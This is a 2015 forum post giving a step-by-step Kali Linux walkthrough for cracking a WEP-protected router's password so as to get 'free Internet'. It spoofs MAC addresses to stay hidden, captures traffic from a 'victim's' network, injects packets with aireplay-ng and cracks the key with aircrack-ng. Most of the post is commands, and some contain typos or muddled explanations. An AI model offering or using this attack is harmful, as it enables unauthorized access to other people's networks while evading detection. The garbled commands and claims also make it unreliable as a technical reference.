The JD3VIL way to crack a router: Enjoy your free Intnet!! For - TopicsExpress



          

The JD3VIL way to crack a router: Enjoy your free Intnet!! For cracking the WEP password at least one client is compulsory so as to get the Identity Vector (IV). If no client is connected to the network, then no Identity vector (IV) will be generated as no data will be sent and the dictionary will also be not created. For cracking the WEP password I use Kali Linux. All the tools are pre-installed. As always starts with good Ol Terminal Emulator root@jd3vil:# ifconfig See what your system is mon0 or Wlan0 root@jd3vil:# iwconfig Wlan0 must be visible here. If wlan0 is visible here and not in the ifconfig command, it means that wlan0 is working properly but it is set off. root@jd3vil:# ifconfig wlan0 up If the error is generated then the unknown error port 132 or wireless is off. If it is not visible in iwconfig command, then your wireless is not working properly, drivers have to be installed.Thats another story. You need a better Laptop lol Now we have to spoof our MAC address: Dont ever hack someones internet and not be hidden.Here is an easy method to change your MAC ADD> root@jd3vil:# ifconfig wlan0 down Have to bring wlan0 down change the Mac to whatever you want and then you have to bring it back up again. root@jd3vil:# macchanger -m 00:11:22:33:44:55 wlan0 root@bt:# ifconfig wlan0 up Now the MAC address is changed, So we want to put our machine into monitoring mode. root@jd3vil:# airmon-ng start wlan0 Now again the ifconfig: root@jd3vil:# ifconfig Here you will see that a new interface mon0 will be created. Or vise versa depending on your location and interface. Now we have to change the MAC address of mon0: Same process below bringing mon0 down and changing it and bringing it back up again. root@jd3vil:# ifconfig mon0 down root@jd3vil:# macchanger -m 00:11:22:33:44:55 mon0 root@jd3vil:# ifconfig mon0 up Now find your victums network you want to crack. root@jd3vil:# airodump-ng mon0 This above command will scan everything in the air and dump it for you to see. THen you can pick which one you want to JD3VIL Copy the BSSID and the channel of the network you want to hack. And coping the channel is helps pin point the correct network as some use the same channel. Channel = ? BSSID = ? root@jd3vil:# airodump-ng --bssid 0C:D2:B5:01:A7:A8 --channel ? --write clone mon0 Here mon0 is an interface. It will be shown when the client will be connected to the network as the data packets will start increasing. Wait until it crosses 5000 data packets or more. This will automatically parse a dictionary. Now open the new terminal: root@jd3vil:# aircrack-ng clone.cap It will create a dictionary automatically through which it will brute force to hack the password. Cap here is to capture the file. Now for the Active Attack: We will catch the clients packets whether encrypted or not, and inject it in the network. We will fetch the packets in which the router gives the response. Now open a new terminal: root@jd3vil:# aireplay-ng List of attacks will be displayed root@jd3vil:# aireply-ng –fakeauth O –a 0C:D2:B5:01:A7:A8 mon0 O is the delay of every request. A is the access point. 0c:D2:B5:01:A7:A8 is the MAC address of the router on which we are sending. Now we will be connected to the router. root@jd3vil:# aireply-ng –arpreply –b 0C:D2:B5:01:A7:A8 mon0 It waits for the ARP packet, your MAC address must be there, fakeauth attack must be working. As it reaches more than 10000: root@jd3vil:# aircrack-ng clone.cap key found! [00:11:22:33:44] ABCDE[12345] Or whatever This is how the WEP password is cracked. Or at least an easy way to do it. Kali makes it so easy with all the tools already on there. JD3VIL 
Posted on: Sun, 04 Jan 2015 02:41:51 +0000

Trending Topics



Recently Viewed Topics




© 2015